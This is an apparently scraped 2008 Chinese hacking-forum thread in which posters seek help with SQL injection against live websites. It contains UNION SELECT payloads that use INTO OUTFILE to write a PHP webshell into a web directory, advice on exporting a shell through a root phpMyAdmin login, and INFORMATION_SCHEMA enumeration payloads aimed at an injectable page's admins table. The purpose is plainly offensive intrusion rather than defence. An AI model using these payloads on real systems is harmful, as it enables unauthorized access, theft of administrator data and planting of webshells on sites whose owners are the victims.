12
返回列表 发帖
btjily

Rank: 1

帖子
30 
积分
43 
威望
52  
金钱
52  
在线时间
1 小时 
21 跳转到 »
发表于 2008-7-20 23:24 | 只看该作者
我就是想问


/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,ts04,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48/**/from/**/gsj.tousu_anjian/**/where/**/ts01=5201314159/**/into/**/outfile/**/'/usr/httpd/lonely/service/angel.php'/*

这个导出语句对了木。。。。。不对的话麻烦哪位大虾,说下改哪个?成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP

唐不狐
很黃很暴力

晶莹剔透§烈日灼然

TOP

→有几坏←

Rank: 1

帖子
11 
积分
17 
威望
22  
金钱
21  
在线时间
0 小时 
22
发表于 2008-7-20 23:24 | 只看该作者
还有一种尝试:找找看有没有PHPMYADMIN的目录,用root登录进去,插表导出shell就舒服多了。当然前提还是得有个目标777的目录
帖子145 精华2 积分574 阅读权限50 性别男 来自china 在线时间106 小时 注册时间2005-9-27 最后登录2008-7-9 查看个人网站
查看详细资料引用 报告 回复 TOP

akens
晶莹剔透§烈日灼然

TOP

FI~鱼~SH

Rank: 1

帖子
15 
积分
22 
威望
29  
金钱
29  
在线时间
0 小时 
23
发表于 2008-7-20 23:24 | 只看该作者
借地方发个和PHP有关的问题:
http://www.***.com/view.php?id=650 存在注入点,手工检测有74个字段,所以没办法用工具查表
用and/**/1=2/**/union/**/select/**/1,TABLE_NAME,3,。。。。。,73,74/**/FROM/**/INFORMATION_SCHEMA.TABLES--
暴出所有表并找到admins表,但是问题来了,常用列都猜了,但是猜不到,想用
/**/and/**/1=2/**/union/**/select/**/1,COLUMN_NAME,3,4。。。。。,73,74/**/FROM/**/INFORMATION_SCHEMA.COLUMNS/**/WHERE/**/TABLE_NAME='admins'--
把admins表中的列暴出来,死活都暴不了,不知道是语句错了还是其他的原因,请大家帮忙看看
帖子22 精华0 积分59 阅读权限40 性别男 在线时间106 小时 注册时间2006-9-30 最后登录2008-6-21 查看详细资料引用 报告 回复 TOP

heiye88
晶莹剔透§烈日灼然

TOP

滚死草

Rank: 1

帖子
10 
积分
15 
威望
20  
金钱
14  
在线时间
0 小时 
24
发表于 2008-7-20 23:24 | 只看该作者
呵呵...不要急...很简单的...先把思路整理好...比如你前面解决那些问题的方法和思考过程都可以写一写。。方便大家帮你。。。也许在整理的过程中你会豁然开朗..
帖子64 精华0 积分239 阅读权限40 在线时间124 小时 注册时间2007-1-25 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP

寂寞宝贝
荣誉会员

TOP

12
返回列表